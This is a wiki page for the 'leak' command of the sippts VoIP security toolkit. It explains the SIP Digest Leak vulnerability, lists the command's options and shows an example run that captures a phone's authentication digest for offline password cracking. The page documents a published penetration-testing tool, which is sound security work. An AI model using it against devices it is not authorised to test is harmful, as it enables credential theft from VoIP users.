Command leak - Pepelux/sippts GitHub Wiki
SIPPS leak exploits the SIP Digest Leak vulnerability discovered by Sandro Gauci that affects a large number of hardware and software devices. The description of the vulnerability is here: https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf
The goal is to make a call to a telephone device (by a INVITE message). When in the other side someone answer the call, there will be no audio and then he or she will hang up. Then we will receive a BYE message. Next we will send a 407 proxy authentication required. If the telephone device is vulnerable, it will response with another BYE message that will include an authentication response.
Having the response we can try to obtain the password by a bruteforce attack on our local machine.
Script Phone
---> INVITE --->
<--- 100 Trying <---
<--- 180 Ringing <---
<--- 200 OK <---
---> ACK --->
<--- BYE <---
---> 407 Proxy Authentication Required (with digest) --->
<--- BYE (with digest response) <---
Usage
$ sippts leak -h
Target:
-i IP|HOST Host/IP address/network (ex: mysipserver.com | 192.168.0.10 | 192.168.0.0/24)
-f FILE File with several IPs (format: ip:port/proto ... one per line)
-r REMOTE_PORT Remote port (default: 5060)
-p PROTOCOL Protocol: udp|tcp (default: udp)
-proxy IP:PORT Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)
Headers:
-d DOMAIN SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
-cd CONTACT_DOMAIN Domain or IP address for Contact header. Ex: 10.0.1.2
-fn FROM_NAME From Name. Ex: Bob
-fu FROM_USER From User (default: 100)
-fd FROM_DOMAIN From Domain. Ex: 10.0.0.1
-tn TO_NAME To Name. Ex: Alice
-tu TO_USER To User (default: 100)
-td TO_DOMAIN To Domain. Ex: 10.0.0.1
-ua USER_AGENT User-Agent header (default: pplsip)
-ppi PPI P-Preferred-Identity
-pai PAI P-Asserted-Identity
-sdp Send SDP in INVITE messages
-sdes Send SDES in SDP
Auth:
-auth AUTH_MODE Authentication mode [www|proxy] (default: www)
-user AUTH_USER Authentication user
-pass AUTH_PASS Authentication password
Log:
-v Increase verbosity
-o FILE Save digest to file in SipCrack format
-l FILE Save result into a log file
Other options:
-local-ip IP Set local IP address (by default try to get it)
-ping Ping host before send attack
-h, --help Show this help
Example
$ sippts leak -i 192.168.2.235
[!] Target: 192.168.2.235:5060/UDP
[!] Caller: 100
[!] Callee: 100
[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:[email protected]:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5